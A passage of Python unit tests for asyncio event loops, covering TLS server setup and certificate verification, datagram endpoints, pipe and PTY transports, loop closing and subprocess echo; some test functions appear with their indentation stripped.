    def test_create_unix_server_path_socket_error(self):
        """Giving both path= and sock= to create_unix_server() is an error."""
        proto = MyProto(loop=self.loop)
        sock = socket.socket()
        with sock:
            f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
            with self.assertRaisesRegex(ValueError,
                                        'path and sock can not be specified '
                                        'at the same time'):
                self.loop.run_until_complete(f)
    def _create_ssl_context(self, certfile, keyfile=None):
        """Build a server-side TLS context loaded with the given cert chain."""
        sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        sslcontext.options |= ssl.OP_NO_SSLv2
        sslcontext.load_cert_chain(certfile, keyfile)
        return sslcontext
    def _make_ssl_server(self, factory, certfile, keyfile=None):
        """Start a TLS server on 127.0.0.1; return (server, host, port)."""
        sslcontext = self._create_ssl_context(certfile, keyfile)

        f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
        server = self.loop.run_until_complete(f)

        sock = server.sockets[0]
        host, port = sock.getsockname()
        self.assertEqual(host, '127.0.0.1')
        return server, host, port
    def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
        """Start a TLS server on a UNIX socket; return (server, path)."""
        sslcontext = self._create_ssl_context(certfile, keyfile)
        return self._make_unix_server(factory, ssl=sslcontext)
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_create_server_ssl(self):
        """A TLS server accepts a TLS client and exchanges data."""
        proto = MyProto(loop=self.loop)
        server, host, port = self._make_ssl_server(
            lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)

        f_c = self.loop.create_connection(MyBaseProto, host, port,
                                          ssl=test_utils.dummy_ssl_context())
        client, pr = self.loop.run_until_complete(f_c)

        client.write(b'xxx')
        self.loop.run_until_complete(proto.connected)
        self.assertEqual('CONNECTED', proto.state)

        test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
        self.assertEqual(3, proto.nbytes)

        # extra info is available
        self.check_ssl_extra_info(client, peername=(host, port))

        # close connection
        proto.transport.close()
        self.loop.run_until_complete(proto.done)
        self.assertEqual('CLOSED', proto.state)

        # the client socket must be closed after to avoid ECONNRESET upon
        # recv()/send() on the serving socket
        client.close()

        # stop serving
        server.close()
    @support.skip_unless_bind_unix_socket
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_create_unix_server_ssl(self):
        """A TLS UNIX-socket server accepts a TLS client and exchanges data."""
        proto = MyProto(loop=self.loop)
        server, path = self._make_ssl_unix_server(
            lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)

        f_c = self.loop.create_unix_connection(
            MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
            server_hostname='')

        client, pr = self.loop.run_until_complete(f_c)

        client.write(b'xxx')
        self.loop.run_until_complete(proto.connected)
        self.assertEqual('CONNECTED', proto.state)
        test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
        self.assertEqual(3, proto.nbytes)

        # close connection
        proto.transport.close()
        self.loop.run_until_complete(proto.done)
        self.assertEqual('CLOSED', proto.state)

        # the client socket must be closed after to avoid ECONNRESET upon
        # recv()/send() on the serving socket
        client.close()

        # stop serving
        server.close()
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_create_server_ssl_verify_failed(self):
        """A client without the CA loaded must fail certificate verification."""
        proto = MyProto(loop=self.loop)
        server, host, port = self._make_ssl_server(
            lambda: proto, test_utils.SIGNED_CERTFILE)

        sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        sslcontext_client.options |= ssl.OP_NO_SSLv2
        sslcontext_client.verify_mode = ssl.CERT_REQUIRED
        if hasattr(sslcontext_client, 'check_hostname'):
            sslcontext_client.check_hostname = True

        # no CA loaded
        f_c = self.loop.create_connection(MyProto, host, port,
                                          ssl=sslcontext_client)
        with mock.patch.object(self.loop, 'call_exception_handler'):
            with test_utils.disable_logger():
                with self.assertRaisesRegex(ssl.SSLError,
                                            '(?i)certificate.verify.failed'):
                    self.loop.run_until_complete(f_c)

            # execute the loop to log the connection error
            test_utils.run_briefly(self.loop)

        # close connection
        self.assertIsNone(proto.transport)
        server.close()
    @support.skip_unless_bind_unix_socket
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_create_unix_server_ssl_verify_failed(self):
        """UNIX-socket variant: missing CA must fail certificate verification."""
        proto = MyProto(loop=self.loop)
        server, path = self._make_ssl_unix_server(
            lambda: proto, test_utils.SIGNED_CERTFILE)

        sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        sslcontext_client.options |= ssl.OP_NO_SSLv2
        sslcontext_client.verify_mode = ssl.CERT_REQUIRED
        if hasattr(sslcontext_client, 'check_hostname'):
            sslcontext_client.check_hostname = True

        # no CA loaded
        f_c = self.loop.create_unix_connection(MyProto, path,
                                               ssl=sslcontext_client,
                                               server_hostname='invalid')
        with mock.patch.object(self.loop, 'call_exception_handler'):
            with test_utils.disable_logger():
                with self.assertRaisesRegex(ssl.SSLError,
                                            '(?i)certificate.verify.failed'):
                    self.loop.run_until_complete(f_c)

            # execute the loop to log the connection error
            test_utils.run_briefly(self.loop)

        # close connection
        self.assertIsNone(proto.transport)
        server.close()
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_create_server_ssl_match_failed(self):
        """Hostname mismatch must raise CertificateError despite a valid CA."""
        proto = MyProto(loop=self.loop)
        server, host, port = self._make_ssl_server(
            lambda: proto, test_utils.SIGNED_CERTFILE)

        sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        sslcontext_client.options |= ssl.OP_NO_SSLv2
        sslcontext_client.verify_mode = ssl.CERT_REQUIRED
        sslcontext_client.load_verify_locations(
            cafile=test_utils.SIGNING_CA)
        if hasattr(sslcontext_client, 'check_hostname'):
            sslcontext_client.check_hostname = True

        # incorrect server_hostname
        f_c = self.loop.create_connection(MyProto, host, port,
                                          ssl=sslcontext_client)
        with mock.patch.object(self.loop, 'call_exception_handler'):
            with test_utils.disable_logger():
                with self.assertRaisesRegex(
                        ssl.CertificateError,
                        "hostname '127.0.0.1' doesn't match 'localhost'"):
                    self.loop.run_until_complete(f_c)

        # close connection
        proto.transport.close()
        server.close()
    @support.skip_unless_bind_unix_socket
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_create_unix_server_ssl_verified(self):
        """TLS over AF_UNIX succeeds with the correct CA and a matching
        server_hostname."""
        proto = MyProto(loop=self.loop)
        server, path = self._make_ssl_unix_server(
            lambda: proto, test_utils.SIGNED_CERTFILE)
        sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        sslcontext_client.options |= ssl.OP_NO_SSLv2
        sslcontext_client.verify_mode = ssl.CERT_REQUIRED
        sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
        if hasattr(sslcontext_client, 'check_hostname'):
            sslcontext_client.check_hostname = True
        # Connection succeeds with correct CA and server hostname.
        f_c = self.loop.create_unix_connection(MyProto, path,
                                               ssl=sslcontext_client,
                                               server_hostname='localhost')
        client, pr = self.loop.run_until_complete(f_c)
        # close connection
        proto.transport.close()
        client.close()
        server.close()
        # wait until the server-side protocol sees connection_lost
        self.loop.run_until_complete(proto.done)
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_create_server_ssl_verified(self):
        """TLS over TCP succeeds with the correct CA and server hostname,
        and the client transport exposes the peer's certificate info."""
        proto = MyProto(loop=self.loop)
        server, host, port = self._make_ssl_server(
            lambda: proto, test_utils.SIGNED_CERTFILE)
        sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        sslcontext_client.options |= ssl.OP_NO_SSLv2
        sslcontext_client.verify_mode = ssl.CERT_REQUIRED
        sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
        if hasattr(sslcontext_client, 'check_hostname'):
            sslcontext_client.check_hostname = True
        # Connection succeeds with correct CA and server hostname.
        f_c = self.loop.create_connection(MyProto, host, port,
                                          ssl=sslcontext_client,
                                          server_hostname='localhost')
        client, pr = self.loop.run_until_complete(f_c)
        # extra info is available
        self.check_ssl_extra_info(client,peername=(host, port),
                                  peercert=test_utils.PEERCERT)
        # close connection
        proto.transport.close()
        client.close()
        server.close()
        # wait until the server-side protocol sees connection_lost
        self.loop.run_until_complete(proto.done)
    def test_create_server_sock(self):
        """create_server(sock=...) must serve on exactly the socket object
        the caller supplied."""
        # Future resolved from inside connection_made via closure.
        proto = asyncio.Future(loop=self.loop)

        class TestMyProto(MyProto):
            def connection_made(self, transport):
                super().connection_made(transport)
                proto.set_result(self)

        sock_ob = socket.socket(type=socket.SOCK_STREAM)
        sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock_ob.bind(('0.0.0.0', 0))
        f = self.loop.create_server(TestMyProto, sock=sock_ob)
        server = self.loop.run_until_complete(f)
        sock = server.sockets[0]
        # identity check: the server must use the caller's socket, not a copy
        self.assertIs(sock, sock_ob)
        host, port = sock.getsockname()
        self.assertEqual(host, '0.0.0.0')
        client = socket.socket()
        client.connect(('127.0.0.1', port))
        client.send(b'xxx')
        client.close()
        server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
    def test_create_server_dual_stack(self):
        """host=None binds both IPv4 and IPv6; a client must be able to
        reach the server over each address family on the same port."""
        f_proto = asyncio.Future(loop=self.loop)

        class TestMyProto(MyProto):
            def connection_made(self, transport):
                super().connection_made(transport)
                f_proto.set_result(self)

        # find_unused_port() is racy, so tolerate a few EADDRINUSE retries
        try_count = 0
        while True:
            try:
                port = support.find_unused_port()
                f = self.loop.create_server(TestMyProto, host=None, port=port)
                server = self.loop.run_until_complete(f)
            except OSError as ex:
                if ex.errno == errno.EADDRINUSE:
                    try_count += 1
                    # give up after 5 collisions rather than loop forever
                    self.assertGreaterEqual(5, try_count)
                    continue
                else:
                    raise
            else:
                break
        # IPv4 client
        client = socket.socket()
        client.connect(('127.0.0.1', port))
        client.send(b'xxx')
        proto = self.loop.run_until_complete(f_proto)
        proto.transport.close()
        client.close()
        # fresh future for the second (IPv6) connection
        f_proto = asyncio.Future(loop=self.loop)
        client = socket.socket(socket.AF_INET6)
        client.connect(('::1', port))
        client.send(b'xxx')
        proto = self.loop.run_until_complete(f_proto)
        proto.transport.close()
        client.close()
        server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
    def test_create_datagram_endpoint(self):
        """Round-trip a datagram between two create_datagram_endpoint()
        endpoints: client sends 3 bytes, server echoes b'resp:' + data."""

        class TestMyDatagramProto(MyDatagramProto):
            # 'inner_self' keeps the outer TestCase 'self' visible in the
            # closure for the loop argument below.
            def __init__(inner_self):
                super().__init__(loop=self.loop)

            def datagram_received(self, data, addr):
                super().datagram_received(data, addr)
                self.transport.sendto(b'resp:'+data, addr)

        # server endpoint bound to an ephemeral local port
        coro = self.loop.create_datagram_endpoint(
            TestMyDatagramProto, local_addr=('127.0.0.1', 0))
        s_transport, server = self.loop.run_until_complete(coro)
        host, port = s_transport.get_extra_info('sockname')
        self.assertIsInstance(s_transport, asyncio.Transport)
        self.assertIsInstance(server, TestMyDatagramProto)
        self.assertEqual('INITIALIZED', server.state)
        self.assertIs(server.transport, s_transport)

        # client endpoint connected to the server's address
        coro = self.loop.create_datagram_endpoint(
            lambda: MyDatagramProto(loop=self.loop),
            remote_addr=(host, port))
        transport, client = self.loop.run_until_complete(coro)
        self.assertIsInstance(transport, asyncio.Transport)
        self.assertIsInstance(client, MyDatagramProto)
        self.assertEqual('INITIALIZED', client.state)
        self.assertIs(client.transport, transport)

        transport.sendto(b'xxx')
        test_utils.run_until(self.loop, lambda: server.nbytes)
        self.assertEqual(3, server.nbytes)
        test_utils.run_until(self.loop, lambda: client.nbytes)
        # received
        # 8 == len(b'resp:') + len(b'xxx')
        self.assertEqual(8, client.nbytes)
        # extra info is available
        self.assertIsNotNone(transport.get_extra_info('sockname'))
        # close connection
        transport.close()
        self.loop.run_until_complete(client.done)
        self.assertEqual('CLOSED', client.state)
        server.transport.close()
def test_create_datagram_endpoint_sock(self):
if (sys.platform == 'win32' and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)):
raise unittest.SkipTest(
'UDP is not supported with proactor event loops')
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
    @unittest.skipUnless(sys.platform != 'win32',
                         "Don't support pipes for Windows")
    def test_read_pipe(self):
        """connect_read_pipe() delivers bytes written to the other end of
        an os.pipe() and signals EOF when the write end is closed."""
        proto = MyReadPipeProto(loop=self.loop)

        rpipe, wpipe = os.pipe()
        pipeobj = io.open(rpipe, 'rb', 1024)

        async def connect():
            t, p = await self.loop.connect_read_pipe(
                lambda: proto, pipeobj)
            self.assertIs(p, proto)
            self.assertIs(t, proto.transport)
            self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
            self.assertEqual(0, proto.nbytes)

        self.loop.run_until_complete(connect())

        os.write(wpipe, b'1')
        test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
        self.assertEqual(1, proto.nbytes)

        os.write(wpipe, b'2345')
        test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
        self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
        self.assertEqual(5, proto.nbytes)

        # closing the write end triggers EOF then connection_lost
        os.close(wpipe)
        self.loop.run_until_complete(proto.done)
        self.assertEqual(
            ['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
        # extra info is available
        self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
    @unittest.skipUnless(sys.platform != 'win32',
                         "Don't support pipes for Windows")
    def test_unclosed_pipe_transport(self):
        # This test reproduces the issue #314 on GitHub
        # repr() of a pipe transport must not raise after the loop was
        # closed with the transport still open.
        loop = self.create_event_loop()
        read_proto = MyReadPipeProto(loop=loop)
        write_proto = MyWritePipeProto(loop=loop)

        rpipe, wpipe = os.pipe()
        rpipeobj = io.open(rpipe, 'rb', 1024)
        wpipeobj = io.open(wpipe, 'w', 1024)

        async def connect():
            read_transport, _ = await loop.connect_read_pipe(
                lambda: read_proto, rpipeobj)
            write_transport, _ = await loop.connect_write_pipe(
                lambda: write_proto, wpipeobj)
            return read_transport, write_transport

        # Run and close the loop without closing the transports
        read_transport, write_transport = loop.run_until_complete(connect())
        loop.close()

        # These 'repr' calls used to raise an AttributeError
        # See Issue #314 on GitHub
        self.assertIn('open', repr(read_transport))
        self.assertIn('open', repr(write_transport))

        # Clean up (avoid ResourceWarning)
        rpipeobj.close()
        wpipeobj.close()
        # detach the pipes so the transports don't try to close them later
        read_transport._pipe = None
        write_transport._pipe = None
    @unittest.skipUnless(sys.platform != 'win32',
                         "Don't support pipes for Windows")
    @unittest.skipIf(sys.platform == 'darwin', 'test hangs on MacOS')
    # Issue #20495: The test hangs on FreeBSD 7.2 but pass on FreeBSD 9
    @support.requires_freebsd_version(8)
    def test_read_pty_output(self):
        """Same as test_read_pipe but reading from the master side of a
        PTY; closing the slave end produces EOF."""
        proto = MyReadPipeProto(loop=self.loop)

        master, slave = os.openpty()
        master_read_obj = io.open(master, 'rb', 0)

        async def connect():
            t, p = await self.loop.connect_read_pipe(lambda: proto,
                                                     master_read_obj)
            self.assertIs(p, proto)
            self.assertIs(t, proto.transport)
            self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
            self.assertEqual(0, proto.nbytes)

        self.loop.run_until_complete(connect())

        os.write(slave, b'1')
        test_utils.run_until(self.loop, lambda: proto.nbytes)
        self.assertEqual(1, proto.nbytes)

        os.write(slave, b'2345')
        test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
        self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
        self.assertEqual(5, proto.nbytes)

        os.close(slave)
        self.loop.run_until_complete(proto.done)
        self.assertEqual(
            ['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
        # extra info is available
        self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
    @unittest.skipUnless(sys.platform != 'win32',
                         "Don't support pipes for Windows")
    def test_write_pipe(self):
        """connect_write_pipe(): bytes written on the transport arrive at
        the read end of an os.pipe()."""
        rpipe, wpipe = os.pipe()
        pipeobj = io.open(wpipe, 'wb', 1024)

        proto = MyWritePipeProto(loop=self.loop)
        connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
        transport, p = self.loop.run_until_complete(connect)
        self.assertIs(p, proto)
        self.assertIs(transport, proto.transport)
        self.assertEqual('CONNECTED', proto.state)

        transport.write(b'1')

        data = bytearray()
        def reader(data):
            # drain whatever is available and report total bytes seen
            chunk = os.read(rpipe, 1024)
            data += chunk
            return len(data)

        test_utils.run_until(self.loop, lambda: reader(data) >= 1)
        self.assertEqual(b'1', data)

        transport.write(b'2345')
        test_utils.run_until(self.loop, lambda: reader(data) >= 5)
        self.assertEqual(b'12345', data)
        self.assertEqual('CONNECTED', proto.state)

        os.close(rpipe)

        # extra info is available
        self.assertIsNotNone(proto.transport.get_extra_info('pipe'))

        # close connection
        proto.transport.close()
        self.loop.run_until_complete(proto.done)
        self.assertEqual('CLOSED', proto.state)
    @unittest.skipUnless(sys.platform != 'win32',
                         "Don't support pipes for Windows")
    def test_write_pipe_disconnect_on_close(self):
        """Closing the read end of a socketpair must drive the write-pipe
        protocol to CLOSED (connection_lost is delivered)."""
        rsock, wsock = socket.socketpair()
        rsock.setblocking(False)
        # hand the write end to the loop as a pipe-like file object
        pipeobj = io.open(wsock.detach(), 'wb', 1024)

        proto = MyWritePipeProto(loop=self.loop)
        connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
        transport, p = self.loop.run_until_complete(connect)
        self.assertIs(p, proto)
        self.assertIs(transport, proto.transport)
        self.assertEqual('CONNECTED', proto.state)

        transport.write(b'1')
        data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
        self.assertEqual(b'1', data)

        rsock.close()

        self.loop.run_until_complete(proto.done)
        self.assertEqual('CLOSED', proto.state)
    @unittest.skipUnless(sys.platform != 'win32',
                         "Don't support pipes for Windows")
    # select, poll and kqueue don't support character devices (PTY) on Mac OS X
    # older than 10.6 (Snow Leopard)
    @support.requires_mac_ver(10, 6)
    def test_write_pty(self):
        """Same as test_write_pipe but writing to the slave side of a PTY
        and reading back from the master fd."""
        master, slave = os.openpty()
        slave_write_obj = io.open(slave, 'wb', 0)

        proto = MyWritePipeProto(loop=self.loop)
        connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
        transport, p = self.loop.run_until_complete(connect)
        self.assertIs(p, proto)
        self.assertIs(transport, proto.transport)
        self.assertEqual('CONNECTED', proto.state)

        transport.write(b'1')

        data = bytearray()
        def reader(data):
            chunk = os.read(master, 1024)
            data += chunk
            return len(data)

        # generous timeout: PTY delivery can be slow on loaded machines
        test_utils.run_until(self.loop, lambda: reader(data) >= 1,
                             timeout=10)
        self.assertEqual(b'1', data)

        transport.write(b'2345')
        test_utils.run_until(self.loop, lambda: reader(data) >= 5,
                             timeout=10)
        self.assertEqual(b'12345', data)
        self.assertEqual('CONNECTED', proto.state)

        os.close(master)

        # extra info is available
        self.assertIsNotNone(proto.transport.get_extra_info('pipe'))

        # close connection
        proto.transport.close()
        self.loop.run_until_complete(proto.done)
        self.assertEqual('CLOSED', proto.state)
    @unittest.skipUnless(sys.platform != 'win32',
                         "Don't support pipes for Windows")
    # select, poll and kqueue don't support character devices (PTY) on Mac OS X
    # older than 10.6 (Snow Leopard)
    @support.requires_mac_ver(10, 6)
    def test_bidirectional_pty(self):
        """Attach a read transport and a write transport to the two
        directions of one PTY slave and exercise traffic both ways."""
        master, read_slave = os.openpty()
        write_slave = os.dup(read_slave)
        # raw mode: no echo/line-buffering to interfere with byte counts
        tty.setraw(read_slave)

        slave_read_obj = io.open(read_slave, 'rb', 0)
        read_proto = MyReadPipeProto(loop=self.loop)
        read_connect = self.loop.connect_read_pipe(lambda: read_proto,
                                                   slave_read_obj)
        read_transport, p = self.loop.run_until_complete(read_connect)
        self.assertIs(p, read_proto)
        self.assertIs(read_transport, read_proto.transport)
        self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
        self.assertEqual(0, read_proto.nbytes)

        slave_write_obj = io.open(write_slave, 'wb', 0)
        write_proto = MyWritePipeProto(loop=self.loop)
        write_connect = self.loop.connect_write_pipe(lambda: write_proto,
                                                     slave_write_obj)
        write_transport, p = self.loop.run_until_complete(write_connect)
        self.assertIs(p, write_proto)
        self.assertIs(write_transport, write_proto.transport)
        self.assertEqual('CONNECTED', write_proto.state)

        data = bytearray()
        def reader(data):
            chunk = os.read(master, 1024)
            data += chunk
            return len(data)

        # slave -> master direction
        write_transport.write(b'1')
        test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
        self.assertEqual(b'1', data)
        self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
        self.assertEqual('CONNECTED', write_proto.state)

        # master -> slave direction
        os.write(master, b'a')
        test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
                             timeout=10)
        self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
        self.assertEqual(1, read_proto.nbytes)
        self.assertEqual('CONNECTED', write_proto.state)

        write_transport.write(b'2345')
        test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
        self.assertEqual(b'12345', data)
        self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
        self.assertEqual('CONNECTED', write_proto.state)

        os.write(master, b'bcde')
        test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
                             timeout=10)
        self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
        self.assertEqual(5, read_proto.nbytes)
        self.assertEqual('CONNECTED', write_proto.state)

        os.close(master)

        read_transport.close()
        self.loop.run_until_complete(read_proto.done)
        self.assertEqual(
            ['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)

        write_transport.close()
        self.loop.run_until_complete(write_proto.done)
        self.assertEqual('CLOSED', write_proto.state)
    def test_prompt_cancellation(self):
        """Cancelling a pending sock_recv() must take effect promptly
        (well under 0.1s), not wait for data or a timeout."""
        r, w = socket.socketpair()
        r.setblocking(False)
        f = self.loop.create_task(self.loop.sock_recv(r, 1))
        # proactor loops expose the pending overlapped operation as 'ov'
        ov = getattr(f, 'ov', None)
        if ov is not None:
            self.assertTrue(ov.pending)

        async def main():
            try:
                self.loop.call_soon(f.cancel)
                await f
            except asyncio.CancelledError:
                res = 'cancelled'
            else:
                res = None
            finally:
                self.loop.stop()
            return res

        start = time.monotonic()
        t = asyncio.Task(main(), loop=self.loop)
        self.loop.run_forever()
        elapsed = time.monotonic() - start

        # the whole cancel round-trip must be fast
        self.assertLess(elapsed, 0.1)
        self.assertEqual(t.result(), 'cancelled')
        self.assertRaises(asyncio.CancelledError, f.result)
        if ov is not None:
            self.assertFalse(ov.pending)
        self.loop._stop_serving(r)

        r.close()
        w.close()
    def test_timeout_rounding(self):
        """Tiny sleep() timeouts must not make the loop spin: count
        _run_once() iterations for sleeps down to 1e-10 s."""
        def _run_once():
            self.loop._run_once_counter += 1
            orig_run_once()

        # instrument the loop's internal iteration to count wake-ups
        orig_run_once = self.loop._run_once
        self.loop._run_once_counter = 0
        self.loop._run_once = _run_once

        async def wait():
            loop = self.loop
            await asyncio.sleep(1e-2, loop=loop)
            await asyncio.sleep(1e-4, loop=loop)
            await asyncio.sleep(1e-6, loop=loop)
            await asyncio.sleep(1e-8, loop=loop)
            await asyncio.sleep(1e-10, loop=loop)

        self.loop.run_until_complete(wait())
        # The ideal number of call is 12, but on some platforms, the selector
        # may sleep at little bit less than timeout depending on the resolution
        # of the clock used by the kernel. Tolerate a few useless calls on
        # these platforms.
        self.assertLessEqual(self.loop._run_once_counter, 20,
            {'clock_resolution': self.loop._clock_resolution,
             'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
    def test_close_running_event_loop(self):
        """close() from inside a running coroutine must raise RuntimeError
        rather than tear the loop down mid-run."""
        @asyncio.coroutine
        def close_loop(loop):
            self.loop.close()

        coro = close_loop(self.loop)
        with self.assertRaises(RuntimeError):
            self.loop.run_until_complete(coro)
    def test_close(self):
        """Every scheduling API on a closed loop must raise RuntimeError."""
        self.loop.close()

        @asyncio.coroutine
        def test():
            pass

        func = lambda: False
        coro = test()
        self.addCleanup(coro.close)

        # operation blocked when the loop is closed
        with self.assertRaises(RuntimeError):
            self.loop.run_forever()
        with self.assertRaises(RuntimeError):
            fut = asyncio.Future(loop=self.loop)
            self.loop.run_until_complete(fut)
        with self.assertRaises(RuntimeError):
            self.loop.call_soon(func)
        with self.assertRaises(RuntimeError):
            self.loop.call_soon_threadsafe(func)
        with self.assertRaises(RuntimeError):
            self.loop.call_later(1.0, func)
        with self.assertRaises(RuntimeError):
            self.loop.call_at(self.loop.time() + .0, func)
        with self.assertRaises(RuntimeError):
            self.loop.create_task(coro)
        with self.assertRaises(RuntimeError):
            self.loop.add_signal_handler(signal.SIGTERM, func)

        # run_in_executor test is tricky: the method is a coroutine,
        # but run_until_complete cannot be called on closed loop.
        # Thus iterate once explicitly.
        with self.assertRaises(RuntimeError):
            it = self.loop.run_in_executor(None, func).__await__()
            next(it)
class SubprocessTestsMixin:
    """Tests for loop.subprocess_exec()/subprocess_shell().

    Mixed into concrete per-event-loop TestCase classes that provide
    ``self.loop`` (and, on Unix, a child watcher — see
    UnixEventLoopTestsMixin).
    """

    def check_terminated(self, returncode):
        """Assert the child exited due to SIGTERM (POSIX); on Windows the
        exact code is unreliable, so only check it is an int."""
        if sys.platform == 'win32':
            self.assertIsInstance(returncode, int)
            # expect 1 but sometimes get 0
        else:
            self.assertEqual(-signal.SIGTERM, returncode)

    def check_killed(self, returncode):
        """Assert the child was killed by SIGKILL (POSIX); on Windows the
        exact code is unreliable, so only check it is an int."""
        if sys.platform == 'win32':
            self.assertIsInstance(returncode, int)
            # expect 1 but sometimes get 0
        else:
            self.assertEqual(-signal.SIGKILL, returncode)

    def test_subprocess_exec(self):
        """Data written to the child's stdin is echoed back on stdout."""
        prog = os.path.join(os.path.dirname(__file__), 'echo.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)
        self.assertEqual('CONNECTED', proto.state)

        stdin = transp.get_pipe_transport(0)
        stdin.write(b'Python The Winner')
        self.loop.run_until_complete(proto.got_data[1].wait())
        with test_utils.disable_logger():
            transp.close()
        self.loop.run_until_complete(proto.completed)
        # closing the transport kills the still-running child
        self.check_killed(proto.returncode)
        self.assertEqual(b'Python The Winner', proto.data[1])

    def test_subprocess_interactive(self):
        """Two writes in sequence are echoed back cumulatively."""
        prog = os.path.join(os.path.dirname(__file__), 'echo.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)
        transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)
        self.assertEqual('CONNECTED', proto.state)

        stdin = transp.get_pipe_transport(0)
        stdin.write(b'Python ')
        self.loop.run_until_complete(proto.got_data[1].wait())
        proto.got_data[1].clear()
        self.assertEqual(b'Python ', proto.data[1])

        stdin.write(b'The Winner')
        self.loop.run_until_complete(proto.got_data[1].wait())
        self.assertEqual(b'Python The Winner', proto.data[1])

        with test_utils.disable_logger():
            transp.close()
        self.loop.run_until_complete(proto.completed)
